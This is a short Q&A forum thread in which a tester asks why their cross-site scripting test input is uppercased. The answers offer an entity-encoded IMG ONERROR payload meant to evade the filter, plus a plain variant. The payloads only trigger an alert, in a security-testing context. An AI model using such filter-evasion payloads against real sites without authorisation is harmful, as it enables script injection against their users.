# How to test using Cross-site Scripting (XSS)

Tags: testing, xss

Cross-site Scripting (XSS) when I use the alert tag in the input box its converting to uppercase in the source code

Comment: any update on the above query?

Comment: if I enter <script>alert('hi')</script> its going as <script>ALERT('HI')</script>

Answer (score 2):

Pleae redirects to https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

```
<IMG SRC=X ONERROR="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
```

[image: tested-in-google-chrome-browser]

Comment: thanks.i have small doubt can I enter this in input box

Comment: any update. Above comment. When I insert <img src=  also the src its converting to SRC its showing error

Comment: Please try to find a valid from XSS_Filter_Evasion_Cheat_Sheet.

Comment: i have tried all the JavaScript variables are changing to uppercase

Answer (score -1):

IMG SRC=X ONERROR="javascript:alert('XSS')"